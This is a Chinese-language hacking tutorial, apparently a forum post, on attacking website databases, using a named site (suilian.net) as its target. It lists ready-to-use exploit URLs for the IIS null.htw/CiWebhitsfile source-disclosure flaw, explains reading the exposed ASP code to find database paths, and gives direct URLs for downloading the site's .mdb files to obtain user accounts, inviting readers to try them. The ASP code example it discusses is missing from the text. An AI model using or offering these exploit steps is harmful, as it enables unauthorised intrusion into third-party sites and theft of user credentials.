佳佳在這裡簡單談一下對數據庫的攻擊。由於本人才疏學淺,望大家能夠批評指正。
一般的web server都要使用數據庫來存儲信息,幾乎所有的網站都要用數據庫。這樣就存在著兩種可能,一種是使用小型數據庫,如aceess,一般就儲存在本地。另一種是使用大型數據庫,如SQL server,Oracle這時候一般就放在另一台機器上,然後通過ODBC來訪問它。
由於頁面經常需要查詢各種信息,修改用戶信息等操作,實質上就是和數據庫打交道了。這樣就給非法用戶留下利用的機會了。
1.對本地數據庫的攻擊。
對本地數據庫的攻擊一種方法就是下載數據庫,然後呢,你就可以打開這個數據庫得到內部的用戶和帳號了,以及其它有用的信息。
下面以“水蓮會”為例:
經過掃描,得知www.suilian.Net使用的是虛擬主機,使用的是Windows NT+IIS4.0.掃描器你可以使用twwwscan或者其它,其實功能都大同小異。
在對IIS攻擊時如果能夠看到ASP源代碼,那麼成功的可能性就很大了。
經過測試,發現此站點存在源代碼暴露漏洞。。。
大家可以試試:
http://www.suilian.net/null.htw?CiWebhitsfile=/maillist.asp%20&CiRestriction=none&CiHiliteType=full http://www.suilian.net/null.htw?CiWebhitsfile=/index.asp%20&CiRestriction=none&CiHiliteType=full http://www.suilian.net/null.htw?CiWebhitsfile=/chat/DetNew.asp%20&CiRestriction=none&CiHiliteType=full http://www.suilian.net/null.htw?CiWebhitsfile=/chat/detail.asp%20&CiRestriction=none&CiHiliteType=full http://www.suilian.net/null.htw?CiWebhitsfile=/chat/topic4.asp%20&CiRestriction=none&CiHiliteType=full http://www.suilian.net/null.htw?CiWebhitsfile=/chat/titlefrm.ASP%20&CiRestriction=none&CiHiliteType=full http://www.suilian.Net/null.htw?CiWebhitsfile=/chat/titlenew.ASP%20&CiRestriction=none&CiHiliteType=full
看見了什麼?
當然源代碼洩露的漏洞有很多種,這裡就不一一列舉,你可以去查漏洞手冊。
現在你就可以去查看ASP源代碼了。
如果你對ASP不熟悉,我簡單介紹一下(其實佳佳也不熟悉)。
ASP是嵌在之間。一般使用VBScript或者JavaScript書寫代碼。
看這個例子使用VBScript書寫的:
這是一個典型的與數據庫連接的代碼。
依次的步驟為:
建立連接對象,
設置數據庫路徑,
打開數據庫,
設置記錄對象,
取記錄。
這裡我們就可以知道數據庫的類型,名稱和路徑,這裡是在當前目錄下。
還可以知道數據庫的表名和字段名稱。
有經驗的程序員一般不會把數據庫名直接放在代碼裡,而是在ODBC裡設置數據源,以增加安全性。
然後就發現存在
d:\S\suilian\chat\news.mdb
d:\S\suilian\topic22.mdb等數據庫
你只要使用
http://www.suilian.Net/chat/news.mdb
http://www.suilian.Net/topic22.mdb
就可以把它下載下來。。。
有什麼問題請在佳佳的BBS留言,經常去586,lovehacker,mayi都是高手。。。
對本地數據庫的攻擊的第二種方法是使用SQL語句,這和遠程數據庫的方法一樣,會在下一節介紹的。
再見!